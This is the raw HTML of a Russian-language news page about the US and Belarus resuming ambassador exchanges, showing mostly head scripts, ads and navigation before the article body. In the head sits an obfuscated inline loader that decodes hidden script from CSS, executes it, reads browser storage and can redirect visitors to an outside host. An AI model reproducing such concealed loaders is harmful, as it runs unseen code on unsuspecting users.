<!DOCTYPE html><html prefix="og: http://ogp.me/ns#" lang="ru"><head><title>Reuters: США и Беларусь возобновляют обмен послами после десятилетнего перерыва | Экономические Новости</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"/> <meta name="referrer" content="origin"><meta name="yandex-verification" content="9a28c4c473219914" /><meta name="yandex-verification" content="9a28c4c473219914" /><meta name="msvalidate.01" content="B41426C32883F1040781CF3774D685FD" /> <meta property="og:title" content="Reuters: США и Беларусь возобновляют обмен послами после десятилетнего перерыва "/><meta property="og:site_name" content="enovosty. Украинские новости дня"/><meta property="og:image" content="https://enovosty.com/wp-content/uploads/2019/09/bez-nazvanija-1-4.jpg"/><meta property="og:type" content="article" /><meta property="og:image:width" content="460" /><meta property="og:image:height" content="302" /><meta property="og:image:alt" content="Reuters: США и Беларусь возобновляют обмен послами после десятилетнего перерыва " /><meta name="google-site-verification" content="lQg1PFdRt2LbXcwJ8zsQT5ZnqQEsNPh4d7LwEmOU_lU" /><style>.toparticles{position:relative}.toparticles #photoPromo{height:216px;width:466px;overflow:hidden}.toparticles #photoPromo li{height:216px}.toparticles div.anythingSlider .anythingControls{display:block}</style><link rel="icon" href="https://enovosty.com/favicon.ico" type="image/x-icon" /><link rel="apple-touch-icon" sizes="144x144" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-144x144.png"> <link rel="apple-touch-icon" sizes="114x114" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-114x114.png"> <link rel="apple-touch-icon" sizes="72x72" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-72x72.png"> <link rel="apple-touch-icon" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png"><link rel="apple-touch-icon-precomposed" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png" /><style>@font-face{font-family:"sw-icon-font";src:url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0");src:url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0#iefix") format("embedded-opentype"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.woff?ver=3.6.0") format("woff"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.ttf?ver=3.6.0") format("truetype"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.svg?ver=3.6.0#1445203416") format("svg");font-weight:normal;font-style:normal}</style><link rel='stylesheet' id='wp-block-library-css' href='https://enovosty.com/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /><link rel='stylesheet' id='wbcr-comments-plus-url-span-css' href='https://enovosty.com/wp-content/plugins/clearfy/components/comments-plus/assets/css/url-span.css' type='text/css' media='all' /><link rel='stylesheet' id='social_warfare-css' href='https://enovosty.com/wp-content/plugins/social-warfare/assets/css/style.min.css' type='text/css' media='all' /><link rel='stylesheet' id='msl-main-css' href='https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/masterslider.main.css' type='text/css' media='all' /><script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquery.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquery-migrate.min.js'></script><meta name="description" content="Дэвид Хейл сообщил, что США и Беларусь приняли решение о возобновлении обмена послами после 10-летнего перерыва" /><meta property="og:description" content="Дэвид Хейл сообщил, что США и Беларусь приняли решение о возобновлении обмена послами после 10-летнего перерыва" /><meta name="keywords" content="обмен,перерыв,посол,новости мира" /><link rel="canonical" href="https://enovosty.com/news_abroad/full/1709-reuters-ssha-i-belarus-vozvrashhayut-poslov-posle-desyatiletnego-pereryva" /><meta property="og:url" content="https://enovosty.com/news_abroad/full/1709-reuters-ssha-i-belarus-vozvrashhayut-poslov-posle-desyatiletnego-pereryva" /><style>.ms-parent-id-4 > .master-slider{background:#000000}.ms-parent-id-3 > .master-slider{background:#000000}.ms-parent-id-2 > .master-slider{background:#000000}.ms-parent-id-1 > .master-slider{background:#000000}</style><script>var ms_grabbing_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grabbing.cur', ms_grab_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grab.cur';</script><meta name="generator" content="MasterSlider 3.1.1 - Responsive Touch Image Slider | www.avt.li/msf" /><style>.wp-polls .pollbar{margin:1px;font-size:6px;line-height:8px;height:8px;background-image:url('https://enovosty.com/wp-content/plugins/wp-polls/images/default/pollbg.gif');border:1px solid #c8c8c8}</style><link rel="amphtml" href="https://enovosty.com/news_abroad/full/1709-reuters-ssha-i-belarus-vozvrashhayut-poslov-posle-desyatiletnego-pereryva?amp"><meta name="fragment" content="!" /><script type="text/javascript">ajaxurl = '/wp-admin/admin-ajax.php';gpid = '4773462';cpage = ''
</script><style>span.swp_share,i.swp_facebook_icon,i.swp_twitter_icon,i.swp_linkedin_icon,span.swp_count{color:#ffffff}table.social{width:50%!important}.swp_share_button{height:max-content!important}.swp_social_panel{margin-bottom:0px!important;margin-top:0px!important}</style><link rel="preload" as="style" disabled type="text/css" rel="stylesheet" href="https://enovosty.com/wp-content/themes/eizvestia/mainstyle.css" /><script type="text/javascript">!function(){var mt="",t="Tag",e="natural",vt="src",st="loader",r="arg",pt="style",gt="text",n="ready",ht=":",a="STC",yt="script",o="image",i="parent",c="append",u="By",l="?",bt="IFRAME",f="add",d="*",A="Name",wt="code",m="Listener",v="no",s="https",p="m",g="Int",h="bold",y="green",b="c",St="_",Ct="write",w="Window",S="Timeout",C="al",Et="call",E="background",M="set",O="IAAAAUEBAAAACw",k="from",Mt="FRAME",B="has",Ot="href",D="Uza",kt="Document",I="create",Bt="Node",F="Of",R="AAA",j="remove",Dt="java",N="Computed",Q="2",It="bind",T="com",Z=".",x=";",Ft="cookie",Rt="close",H="base",L="GODlh",U="query",q="Property",z="HM",G='"',J="weight",jt="substr",Nt="warn",P="Selector",Qt="floor",W="parse",X="Storage",Y="d1e",_="timeout",Tt="id",Zt="cdn",xt="location",Ht="document",K="AAAQABAAACAk",V="Height",Lt="random",Ut="type",qt="head",zt="Em",$="ttt",tt="Loaded",et="Event",rt=")",Gt="Image",Jt="loading",nt="%",Pt="&",Wt="name",at="S",Xt="length",ot="@import",it="local",ct="font",Yt=",",ut="Style",lt="Descriptor",ft="'",dt="Child",At="color",_t="get",Kt="1",Vt=" ",$t="ZZZ2m",te="data",ee="gif",re="Own",ne="debug",ae="Math",oe="Item",ie="Content",ce="link",ue="complete",le="load",fe="Attribute",de="(",Ae="=",me="AQABA",ve="Elements",se="replace",pe="DOMContent",ge="match",he="content",ye="NO",be="key",we="/",Se="f4FFv",Ce="State",Ee="R1cj",Me="Element",Oe="atob",ke="-",Be="MSStream",De="<",Ie="Object",Fe="opener",Re="R0l",je=">",Ne="disabled",Qe="console",Te="r",Ze="index",xe="QBADs",He="prototype",Le="YXJnb24",Ue="All",qe=$+$t,ze=te+ht+o+we+ee+x+H,Ge=(Yt=Yt,O+R),Je=Re+L+me,Pe=K+xe+Ae,We=C+Ee+D+z+Ae,Xe=(St=St,De+ye),Ye=at+je,_e=I+Me,Ke=_t+ve+u+t+A,Ve=c+dt,$e=he+w,tr=_t+re+q+lt,er=n+Ce,rr=f+et+m,nr=U+P+Ue,ar=j+dt,or=M+S,ir=W+g,cr=_t+N+ut,ur=Le+Ae,lr=Q+Ae+Kt,fr=nt+b,dr=At+ht+y+x+ct+ke+J+ht+h,Ar=it+X,mr=_t+oe,vr=Ze+F,sr=Y+Ae,pr=j+oe,gr=s+ht+we+we,hr=Z+T+we+l+Te+Ae,yr=(Pt=Pt,gt+ie),br=de+rt+x,wr=St+p,Sr=B+fe,Cr=ot+Vt+ft,Er=ft+x,Mr=De+pt+je,Or=we+d,kr=d+we,Br=De+we+pt+je,Dr=e+V,Ir=i+Bt,Fr=pe+tt,Rr=le+Vt+r,jr=E+Gt,Nr=G+rt,Qr=(ht=ht,Jt+Vt+k+Vt+a),Tr=a+Vt+_,Zr=v+Vt+a;!function(){var t=window,i=t[Ht],e=Mt,r=ne,n=Dt,c=n+yt,a=wt,o=zt+a,u=0,l=1,f=2,d=3,A=10,m=8*f,v=A*A,s=m*m,p=s*s,g=s*d+d*(m+l),h=qe,y=Se,b=st,w=b+Zt,S=ze+m*f*f+Yt,C=Ge,E=S+Je+C+Pe,M=t[ae][Qt],O=t[ae][Lt],k=function(t){i[Ct](t)},B=u,D=m,I=u,F=u,R=function(){},j=We;try{if(t[Fe][St+h]==y)return t[Fe][St+h]=mt,k(Xe+e+Ye),i[Rt]()}catch(t){}var N=i[_e](bt),Q=i[Ke](qt)[0],T=ot();N[Wt]=T,Q[Ve](N);var Z,x,H,L,U=T?t[T]:N[$e],q=u;try{H=U[Ht]}catch(t){return}try{Z=U[Ie][tr](U[kt][He],er)[_t][It](i),x=H[_e][It](i),L=U[Oe],j=L(j),q=!!U[Be]}catch(t){q=l}if(q)return ut(),ct();var z=new U[Gt],G=H[rr],J=(H[nr][It](i),U[Bt][He]),P=J[Ve],W=J[ar],X=(H[Ke][It](i),U[or][It](t)),Y=U[ir],_=U[cr][It](t),K=x[It](i,yt);k=H[Ct][It](i),M=U[ae][Qt],O=U[ae][Lt];var V=L(ur);H[Ft][ge](V+St+r+lr)&&(R=U[Qe][Nt][It](U[Qe],fr+o,dr)),z[vt]=E;for(var $=U[Ar]||[],tt=0;tt<$[Xt];tt++){var et=$[be](tt);if(Y(et[jt](0,d),m)+mt==et[jt](d)){var rt=$[mr](et);if(rt[Xt]<v&&rt[vr](sr)==u)return $[pr](et),t[xt]=gr+w+hr+t[xt]+Pt+rt}}var nt=ot(),at=K();function ot(){return wr+M(O()*p*p)}function it(t){dt(),B||(F=ut(l),I=ct(l),t())}function ct(t){var e=ft(ce,Ne);return e&&e[Sr](Ot)?lt(Cr+e[Ot]+Er,t):e}function ut(t){var e=ft(yt,Ut,pt);if(e)return lt(e[gt],t)}function lt(t,e){if(k(Mr+t+Or+ot()+kr+Br),e)return ft(pt)}function ft(t,e,r){for(var n=i[Ke](t),a=n[Xt];-1<--a;)if(!e||n[a][Sr](e)&&(!r||n[a][e]==r))return n[a]}function dt(){z[ue]?z[Dr]||(B=l,I&&I[Ir][ar](I),F&&F[Ir][ar](F)):D--&&X(dt,l)}function At(){if(Z()==Jt)return G[Et](i,Fr,At);R(Rr);var t,e=x(pt);e[Tt]=j,P[Et](Q,e);var r=_(e)[jr];if(r[Xt]>v){var n=K(),a=r[jt](g)[se](Nr,mt),o=ot();U[o]=P[It](Q,n),t=a[jt](m*f),W[Et](Q,e),n[yr]=L(t),U[xt]=c+ht+o+br,R(Qr)}else Z()!=ue?(R(Tr),X(At,s)):R(Zr)}t[nt]=it[It](t,At),at[yr]=nt+br,P[Et](Q,at)}()}();</script><link rel="stylesheet" id="like-dislike-css" href="https://enovosty.com/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/css/ldc-lite.min.css?v=1&#038;ver=1.0.0" type="text/css" media="all" /><script><!--//--><![CDATA[//><!--
var pp_gemius_identifier = new String('.WeQbWs7d1FI7fa_VrIDknZ233jNFqLPdhORXpDm_jL.27');//--><!]]></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/x_gemius.js"></script><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-addcount.js.php?top_ten_id=4773462&amp;a=6236" async></script><!--[if lte IE 7]><link rel="stylesheet" href="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/css/anythingslider-ie.css" type="text/css" media="screen" /><![endif]--><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/js/jquery.anythingslider1.min.js"></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jqvisible.js"></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/common.js"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/adriver.core.2.ua.min.js"></script><script type="text/javascript">(function () {var w = window,d = document,protocol = /https/i.test(w.location.protocol) ? 'https:' : 'http:',aml = typeof admixerML !== 'undefined' ? admixerML : {};aml.fn = aml.fn || [];aml.invPath = aml.invPath || (protocol + '//inv-nets.admixer.net/');
aml.cdnPath = aml.cdnPath || (protocol + '//cdn.admixer.net/');
aml.noCriteo = true;if (!w.admixerML) {var lodash = document.createElement('script');lodash.id = 'amlScript';lodash.async = true;lodash.type = 'text/javascript';lodash.src = aml.cdnPath + 'scripts3/loader2.js';var node = d.getElementsByTagName('script')[0];node.parentNode.insertBefore(lodash, node);w.admixerML = aml;}})();</script> <meta property="fb:admins" content="100009507220682"/><meta property="fb:app_id" content="2113796585568948"/><script>function setHomepage(){var homepage = 'https://enovosty.com';
if (document.all){document.body.style.behavior='url(#default#homepage)';document.body.setHomePage(homepage);}else if (window.sidebar){if(window.netscape){try{netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");}catch(e){alert("this action was aviod by your browser，if you want to enable，please enter about:config in your address line,and change the value of signed.applets.codebase_principal_support to true");}}var prefs = Components.classes['@mozilla.org/preferences-service;1'].getService(Components. interfaces.nsIPrefBranch);prefs.setCharPref('browser.startup.homepage',homepage);}}</script><script>var _gaq = _gaq || [];var pluginUrl = '//www.google-analytics.com/plugins/ga/inpage_linkid.js';
_gaq.push(['_require', 'inpage_linkid', pluginUrl]);_gaq.push(['_setAccount', 'UA-12467142-3']);_gaq.push(['_addOrganic', 'nova.rambler.ru', 'query']);_gaq.push(['_addOrganic', 'go.mail.ru', 'q']);_gaq.push(['_addOrganic', 'nigma.ru', 's']);_gaq.push(['_addOrganic', 'webalta.ru', 'q']);_gaq.push(['_addOrganic', 'aport.ru', 'r']);_gaq.push(['_addOrganic', 'poisk.ru', 'text']);_gaq.push(['_addOrganic', 'km.ru', 'sq']);_gaq.push(['_addOrganic', 'liveinternet.ru', 'ask']);_gaq.push(['_addOrganic', 'quintura.ru', 'request']);_gaq.push(['_addOrganic', 'search.qip.ru', 'query']);_gaq.push(['_addOrganic', 'gde.ru', 'keywords']);_gaq.push(['_addOrganic', 'gogo.ru', 'q']);_gaq.push(['_addOrganic', 'ru.yahoo.com', 'p']);_gaq.push(['_addOrganic', 'images.yandex.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogsearch.google.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogs.yandex.ru', 'text', true]);_gaq.push(['_setDomainName', 'enovosty.com']);_gaq.push(['_trackPageview']);(function() {var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'https://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);})();</script><script>function trackOutboundLink(link, category, action) {var url = '';if(link.href) url = link.href;if(url == ''){str = link.getAttribute("onclick");m = str.match("(https:\/\/.*?)\'");if(m) url = m[1];}try {_gaq.push(['_trackEvent', category , action]);} catch(err){}setTimeout(function() {}, 100);}</script><script>jQuery(document).ready(function($){$("a").each(function() {var href = $(this).attr("href");var target = $(this).attr("target");var text = $(this).text();var a = new RegExp('/' + window.location.host + '/');var e = /([-a-zA-Z0-9@:%_\+.~#?&\/\/=]{2,256}\.[a-z]{2,4}\b(\/?[-a-zA-Z0-9@:%_\+.~#?&\/\/=]*)?)/gi;var b = new RegExp(e);$(this).click(function(event) {if (this.href && b.test(this.href) && !a.test(this.href) && (href.indexOf("enovosty.com") == -1)) {console.log("document.URL : "+this.href);event.preventDefault();_gaq.push(["_trackEvent", "Links", "Clicked", href, , false]);setTimeout(function() {window.open(href,(!target?"_self":target));},300);}});});});</script><script>(function(){var j=163229,f=false,b=document,c=b.documentElement,e=window;function g(){var a="";a+="rt="+(new Date).getTime()%1E7*100+Math.round(Math.random()*99);a+=b.referrer?"&r="+escape(b.referrer):"";return a}function h(){var a=b.getElementsByTagName("head")[0];if(a)return a;for(a=c.firstChild;a&&a.nodeName.toLowerCase()=="#text";)a=a.nextSibling;if(a&&a.nodeName.toLowerCase()!="#text")return a;a=b.createElement("head");c.appendChild(a);return a}function i(){var a=b.createElement("script");a.setAttribute("type","text/javascript");a.setAttribute("async","true");a.setAttribute("src","https://s.luxadv.com/t/lb"+j+"_3.js?"+g());typeof a!="undefined"&&h().appendChild(a)}function d(){if(!f){f=true;i()}};if(b.addEventListener)b.addEventListener("DOMContentLoaded",d,false);else if(b.attachEvent){c.doScroll&&e==e.top&&function(){try{c.doScroll("left")}catch(a){setTimeout(arguments.callee,0);return}d()}();b.attachEvent("onreadystatechange",function(){b.readyState==="complete"&&d()})}else e.onload=d})();</script><script async src='https://www.googletagservices.com/tag/js/gpt.js'></script><script>var googletag = googletag || {};googletag.cmd = googletag.cmd || [];</script><script>googletag.cmd.push(function() {googletag.defineSlot('/17774365/enovosty.com_300x600', [300, 600], 'div-gpt-ad-1531223757969-0').addService(googletag.pubads());googletag.defineSlot('/17774365/enovosty.com_300x600_2', [300, 600], 'div-gpt-ad-1531304104065-0').addService(googletag.pubads());//googletag.defineSlot('/17774365/enovosty.com_728x90', [728, 90], 'div-gpt-ad-1531223757969-1').addService(googletag.pubads());
googletag.defineSlot('/59256651/ads_ei_468_60', [468, 60], 'div-gpt-ad-1516280158772-0').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});
</script></head><body><script type='text/javascript'>admixerML.fn.push(function() {// Правая колонка - верх
if(/ukr.net/i.test(document.referrer)){admixerML.defineSlot({z: '7af953ae-795d-4e3e-8b55-c1906dcae224', ph: 'admixer_7af953ae795d4e3e8b55c1906dcae224_zone_12623_sect_1082_site_1069',i: 'inv-nets'});} else {admixerML.defineSlot({z: '9743148c-0bcf-416e-8ab5-55d24689e145', ph: 'admixer_9743148c0bcf416e8ab555d24689e145_zone_1845_sect_1082_site_1069', i: 'inv-nets'});};admixerML.defineSlot({z: '6c64e196-3fa9-43cf-8c1e-fd800277f90c', ph: 'go2net_6c64e1963fa943cf8c1efd800277f90c_zone_28808_sect_9220_site_7570', i: 'inv-nets', s:'7901bb9a-67fa-4dcd-8ae7-8a34d5bc7852'});// Нигде не выводится

// Статьи/Новости внизу
admixerML.defineSlot({z: '3b1188cc-6614-4215-a9bc-9ecb1d9b44e9', ph:
'admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069', i:
'inv-nets' ,renderedCallback: function(e) {var player = e.ph.childNodes[0].contentWindow &&
e.ph.childNodes[0].contentWindow.player;if (player){player.mute();}}});// Футтер
admixerML.defineSlot({z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f', ph:
'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069', i:
'inv-nets'});
admixerML.defineSlot({z: '5dacd85f-7810-44f5-831a-9a7b2add1a5f', ph: 'admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069', i: 'inv-nets'});admixerML.singleRequest();});</script><script><!--
bmN=navigator,bmD=document,bmD.cookie='b=b',i=0,bs=[],bm={v:101585,s:101585,t:6,c:bmD.cookie?1:0,n:Math.round((Math.random()* 1000000)),w:0};for(var f=self;f!=f.parent;f=f.parent)bm.w++;try{if(bmN.plugins&&bmN.mimeTypes.length&&(x=bmN.plugins['Shockwave Flash']))bm.m=parseInt(x.description.replace(/([a-zA-Z]|\s)+/,''));else for(var f=3;f<20;f++)if(eval('new ActiveXObject("ShockwaveFlash.ShockwaveFlash.'+f+'")'))bm.m=f}catch(e){;}try{bm.y=bmN.javaEnabled()?1:0}catch(e){;}try{bmS=screen;bm.v^=bm.d=bmS.colorDepth||bmS.pixelDepth;bm.v^=bm.r=bmS.width}catch(e){;}r=bmD.referrer.replace(/^w+:\/\//,'');if(r&&r.split('/')[0]!=window.location.host){bm.f=escape(r).slice(0,400).slice(0,400);bm.v^=r.length}bm.v^=window.location.href.length;for(var x in bm) if(/^[vstcnwmydrf]$/.test(x)) bs[i++]=x+bm[x];bmD.write('<img src="//c.bigmir.net/?'+bs.join('&')+'"  width="0" height="0" alt="bigmir)net TOP 100" title="bigmir)net TOP 100" />');
//--></script><noscript><img src="//c.bigmir.net/?v101585&s101585&t6" width="0" height="0" alt="" title="" /></noscript><div id="fb-root"></div><script>window.fbAsyncInit = function() {FB.init({appId      : '2113796585568948',cookie     : true,xfbml      : true,version    : 'v3.0'
});
FB.AppEvents.logPageView();
};(function(d, s, id){var js, fjs = d.getElementsByTagName(s)[0];if (d.getElementById(id)) {return;}js = d.createElement(s); js.id = id;js.src = "https://connect.facebook.net/en_US/sdk.js";
fjs.parentNode.insertBefore(js, fjs);}(document, 'script', 'facebook-jssdk'));</script><div id="adriver_banner_branding"></div><div id='admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069'></div><script>admixerML.fn.push(function() {admixerML.display('admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069');});</script><div class="container"> <div style="margin-top:3px"> <div id="right_ban"></div> <div class="mltlngg_switcher"><span>Рус</span><a href="https://enovosty.com/uk/news_abroad-ukr/full/1709-reuters-ssha-i-bilorus-vidnovlyuyut-obmin-poslami-pislya-desyatirichnoi-perervi">Укр</a></div> </div> <div class="cls"></div><div id="header" style="padding-top: 0px; margin-top: 0px;" ><div id="headerTop"><div class="cls"></div></div>   <div id="headerMiddle"><a href="https://enovosty.com/"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/srclogo.png" id="logo" alt="Экономические новости" title="Экономические новости" /></a> <a href="https://enovosty.com/konverter-valyut" class="finmarket">Конвертер валют</a><a href="https://enovosty.com/video" class="videohead">Видео</a><a class="wap" rel="nofollow" href="https://enovosty.com/news_abroad/full/1709-reuters-ssha-i-belarus-vozvrashhayut-poslov-posle-desyatiletnego-pereryva?mobile=1"></a><a class="wap-img" title="Мобильная версия сайта" rel="nofollow" href="https://enovosty.com/news_abroad/full/1709-reuters-ssha-i-belarus-vozvrashhayut-poslov-posle-desyatiletnego-pereryva?mobile=1"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/wap1.png" alt="Мобильная версия сайта" /></a> <div class="wiget simple" id="curs"><span style="text-align:center;display: block;font-size: 12px;font-weight: 700;"><a style="color: #369;" href="https://enovosty.com/currency-rates">Курсы валют</a></span><div class="header-currency"><a href="https://enovosty.com/currency-rates"><table class="currency"> <tr class="cur_shap"><td>&nbsp;</td><td><strong>Продажа</strong></td><td><strong>Покупка</strong></td><td><strong>НБУ</strong></td> </tr> <tr><td>USD</td><td>24.88</td><td>24.60</td><td>25.14</td> </tr> <tr class="tr_white"><td>EUR</td><td>27.60</td><td>27.05</td><td>27.75</td> </tr> <tr><td>RUB</td><td>0.40</td><td>0.30</td><td>0.38</td> </tr></table></a></div></div><div class="wiget simple" id="fonds"><span style="color: #369;text-align: center;display: block;font-size: 12px;font-weight: 700;">Фондовые индексы</span><table class="currency index"> <tr class="cur_shap"> <td>&nbsp;</td><td><strong>Знач.</strong></td><td><strong>Изм.,&nbsp;%</strong></td><td><strong>Время</strong></td> </tr> <tr> <td>PFTS</td><td>516.48</td><td>-0.01</td><td>20:36 17.09.2019</td> </tr> <tr class="tr_white"> <td>UX</td><td>1561.74</td><td>0.00</td><td>17:00 17.09.2019</td> </tr> <tr> <td>RTS</td><td>1381.50</td><td>-1.05</td><td>18:51 17.09.2019</td> </tr></table></div><div class="wiget simple" id="toplivo"><span style="color: #369;text-align:center;display: block;font-size: 12px;font-weight: 700;">Стоимость нефти (ICE)</span><table class="currency benzin"><tr class="cur_shap"><td></td><td><strong>$/баррель</strong></td><td><strong>Изм., %</strong></td><td><strong>Дата</strong></td></tr><tr><td style="text-align:left;padding-left: 2px;">BRENT</td><td>65.78</td><td>-4.69</td><td style="text-transform:uppercase;">Sep</td></tr><tr class="tr_white"><td style="text-align:left;padding-left: 2px;">WTI</td><td>67.49</td><td>-0.84</td><td style="text-transform:uppercase;">Aug</td></tr><tr><td style="text-align:left;padding-left: 2px;">GAS OIL</td><td>630.25</td><td>-0.52</td><td style="text-transform:uppercase;">Aug</td></tr></table></div> <div id="header_right"> <a href="https://enovosty.com/rss/rss.xml">RSS</a><a href="https://enovosty.com/afisha" class="h-anonsy"> <img src="https://enovosty.com/wp-content/themes/eizvestia/img/afisha3.png" width="56" alt="Деловая афиша" title="Деловая афиша" />Афиша</a><a class="archive" href="https://enovosty.com/archive">Архив</a><div style="clear: both;vertical-align:top;"> <a href="https://enovosty.com" title="Последние новости - &quot;ЭКОНОМИЧЕСКИЕ НОВОСТИ&quot;" onclick="window.external.AddFavorite(this.href, this.title); return false;" rel="sidebar">Добавить в закладки</a> </div> </div> <div class="cls"></div></div> <div id="mainMenu" data-hover="hover-on-menu"><ul id="ull" class="menu"><li class="menu-item-has-children"><a class="first" href="https://enovosty.com/news" data-hover="hover-on-link">Новости</a><ul class="sub-menu"><li><a href="https://enovosty.com/news_politics">Политика</a></li><li><a href="https://enovosty.com/news_kiev">Киев</a></li><li><a href="https://enovosty.com/news_economy">Экономика</a></li><li><a href="https://enovosty.com/news-finance">Финансы</a></li><li><a href="https://enovosty.com/news_ekskluzive">Эксклюзив</a></li><li><a href="https://enovosty.com/news-markets">Рынки</a></li><li><a href="https://enovosty.com/news_society">Общество</a></li><li class="current-menu-item"><a href="https://enovosty.com/news_abroad">Мир</a></li><li><a href="https://enovosty.com/news_sport">Cпорт</a></li><li><a href="https://enovosty.com/news-culture">Культура</a></li><li><a href="https://enovosty.com/news-auto">Авто</a></li><li><a href="https://enovosty.com/news_incidents">Происшествия</a></li><li><a href="https://enovosty.com/news_technology">Наука и технологии</a></li><li><a href="https://enovosty.com/zdorove">Здоровье</a></li></ul></li><li><a href="https://enovosty.com/politika">Политика</a></li><li><a href="https://enovosty.com/ekonomika">Экономика</a></li><li><a href="https://enovosty.com/finance">Финансы</a></li><li><a href="https://enovosty.com/markets">Рынки</a></li><li><a href="https://enovosty.com/society">Общество</a></li><li><a href="https://enovosty.com/tehnologii">Технологии</a></li><li><a href="https://enovosty.com/auto">Авто</a></li><li ><a href="https://enovosty.com/blogs">Мнения</a></li><li ><a href="https://enovosty.com/person">Досье</a></li><li id="menu-item-4513425_old" ><a href="https://enovosty.com/currency-rates">Курсы валют</a></li><li id="menu-item-4513319" class="menu-item-has-children" style="border-right: 1px solid #fff;"><a href="#">Ещё...</a><ul class="sub-menu"><li><a href="https://enovosty.com/o-proekte">О проекте</a></li><li><a href="https://enovosty.com/author">Авторы</a></li><li><a href="https://enovosty.com/photo-nedeli">Фото недели</a></li><li><a href="https://enovosty.com/presidenty-2019">Кандидаты в президенты 2019</a></li><li><a href="https://enovosty.com/vybory-2019" >Выборы 2019</a></li></ul></li></ul></div><script>jQuery(document).ready(function($){if(jQuery( window ).width() < 606){var touchHover = function() {$('.first').click(function(e){e.preventDefault();var $this = $(this);var onHover = $this.attr('data-hover');var linkHref = $this.attr('href');if (linkHref && $this.hasClass(onHover)) {location.href = linkHref;return false;}$this.toggleClass(onHover);});$('.finance').click(function(e){e.preventDefault();var $this = $(this);var onHover = $this.attr('data-hover');var linkHref = $this.attr('href');if (linkHref && $this.hasClass(onHover)) {location.href = linkHref;return false;}$this.toggleClass(onHover);});};$(document).ready(function() { touchHover(); });}});</script> </div>  <div id="body"><div class="cls"></div><div id="sidebarLeft_n" style="width:210px;"><script>jQuery(document).ready(function($){$('#slider').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :true,delay : 8000,autoPlayLocked : true,pauseOnHover : true
});});</script><div class="topnews_single slide"><p style="padding: 0 7px;
font-weight: 700;
font-family: arial,verdana,tahoma;
background: url(/wp-content/themes/eizvestia/img/blueline.jpg) repeat-x;
line-height: 9px;
margin: 2px 0 9px;
text-align: center;"><a href="https://enovosty.com/top-news"><span style="background-color: #fff;
font-size: 12px;
color: #326698;
text-transform: uppercase;
padding: 0 9px;">Топ-новости &nbsp;&nbsp;<i style="font-size: 11px;color: #666;font-style: normal;text-transform: none;">за 24 часа</i></span></a></p><ul id="slider"><li><ul class="tact"><li id="li0" style="width:210px;"><a href="https://enovosty.com/news-finance/full/1709-ukrainskim-fermeram-vydelyat-44-milliarda-na-udeshevlenie-kreditov" title="Украинским фермерам выделят 4,4 миллиарда на удешевление кредитов"><img width="210" height="156" alt="Украинским фермерам выделят 4,4 миллиарда на удешевление кредитов" src="https://enovosty.com/wp-content/uploads/2019/09/1539676416_pole.jpg"></a><a href="https://enovosty.com/news-finance/full/1709-ukrainskim-fermeram-vydelyat-44-milliarda-na-udeshevlenie-kreditov" title="Украинским фермерам выделят 4,4 миллиарда на удешевление кредитов" class="name">Украинским фермерам выделят 4,4 миллиарда на удешевление кредитов <span>(132)</span></a></li></ul></li><li><ul class="tact"><li id="li1" style="width:210px;"><a href="https://enovosty.com/news_abroad/full/1709-v-ssha-uspeshno-integrirovali-istrebiteli-a-35-s-samoletami-shpionami-u-2-dlya-perexvata-ballisticheskix-raket" title="В США успешно интегрировали истребитель F-35 с самолетом-шпионом U-2 для перехвата баллистических ракет"><img width="210" height="156" alt="В США успешно интегрировали истребитель F-35 с самолетом-шпионом U-2 для перехвата баллистических ракет" src="https://enovosty.com/wp-content/uploads/2019/09/1-3-4.jpg"></a><a href="https://enovosty.com/news_abroad/full/1709-v-ssha-uspeshno-integrirovali-istrebiteli-a-35-s-samoletami-shpionami-u-2-dlya-perexvata-ballisticheskix-raket" title="В США успешно интегрировали истребитель F-35 с самолетом-шпионом U-2 для перехвата баллистических ракет" class="name">В США успешно интегрировали истребитель F-35 с самолетом-шпионом 